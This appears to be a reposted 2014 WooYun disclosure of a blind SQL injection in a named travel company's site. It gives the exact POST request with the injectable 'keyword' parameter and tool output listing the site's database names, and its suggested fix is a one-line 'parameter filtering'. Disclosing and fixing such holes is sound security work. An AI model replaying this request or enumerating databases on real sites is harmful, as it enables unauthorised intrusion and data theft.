记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

同程旅游网某站点MSSQL注射

2014-12-16 02:45

注入点:

code 区域
POST /ajax/GetUrlByParam HTTP/1.1

Content-Length: 77

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http://go.ly.com

Cookie: COMSEInfo=RefId=1308721&SEFrom=&SEKeyWords=&RefUrl=

Host: go.ly.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

Accept: */*



keyword=*&type=youji



参数keyword可注入。bool blind。

漏洞证明:

code 区域
current database:    'TCComDB'



ly.com_MSSQL_1.png



code 区域
DBMS: Microsoft SQL Server 2008



部分数据表:

code 区域
[14:31:11] [INFO] retrieved: 17u_net

[14:32:37] [INFO] retrieved: ISData

[14:33:49] [INFO] retrieved: master

[14:35:03] [INFO] retrieved: model

[14:36:09] [INFO] retrieved: msdb

[14:37:00] [INFO] retrieved: TCB2cBhsg

[14:38:45] [INFO] retrieved: TCB2cWdnDa F

[14:40:58] [INFO] retrieved: TCCNNCommtoitm9

[14:43:43] [INFO] retrieved: TCBomBI b

[14:45:25] [INFO] retrieved: TCM>efeF

[14:47:17] [INFO] retrieved: kE_orXQ

[14:48:45] [INFO] retrieved: QCE>Z!V0,U

修复方案:

参数过滤

知识来源: www.wooyun.org/bugs/wooyun-2014-087233

阅读:44601 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“同程旅游网某站点MSSQL注射”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云